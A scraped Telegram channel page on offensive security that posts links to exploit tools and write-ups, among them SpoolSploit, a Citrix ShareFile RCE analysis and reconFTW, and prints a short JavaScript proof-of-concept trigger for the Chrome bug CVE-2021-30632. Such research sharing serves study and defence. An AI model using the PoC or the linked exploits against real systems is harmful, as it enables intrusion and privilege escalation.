12.5K subscribers
550 photos
27 videos
24 files
889 links
This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.iss.one/APT_Notes/6

Chat Link:
t.iss.one/APT_Notes_PublicChat
Download Telegram
Kali Linux Tools Page

Now you can learn more about all the tools that you can install in Kali.

https://kali.org/tools/

#tools #cheatsheet #kali
SpoolSploit

SpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access.

https://github.com/BeetleChunks/SpoolSploit

#ad #spooler #rpc
CVE-2021-30632 — Chrome 0day

var a;
function foo() {
a = new Uint32Array(100);
}
%PrepareFunctionForOptimization(foo);
foo();
foo();
a["xxx"] =1;
delete a["xxx"];
%OptimizeFunctionOnNextCall(foo);
foo();

#Chrome #0day #PoC
Forwarded from burpsuite (not official)
5 RCEs in npm for $15,000
robertchen.cc/blog
RCE in Citrix ShareFile Storage Zones Controller (CVE-2021-22941)

Amazing writeup on finding a vulnerability through .NET reversing, enjoyed reading about the breakpoints that were set and how they logically owned Citrix ShareFile through a third party dependency

https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html

#citrix #sharefile #rce
Hunt Evil.pdf
1.5 MB
SANS DFIR — Hunt Evil

#forensic #sans #dfir
Beginners Guide to 0day/CVE AppSec Research

Walks through finding open-source web apps, environment setup, debugging for vulns, creating a Blind SQL time-based exploit, and publishing to @ExploitDB/MITRE CVE

https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html

#appsec #0day #research
This media is not supported in your browser
VIEW IN TELEGRAM
reconFTW

ReconFTW automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.

https://github.com/six2dez/reconftw

#reconFTW #bugbounty #hacking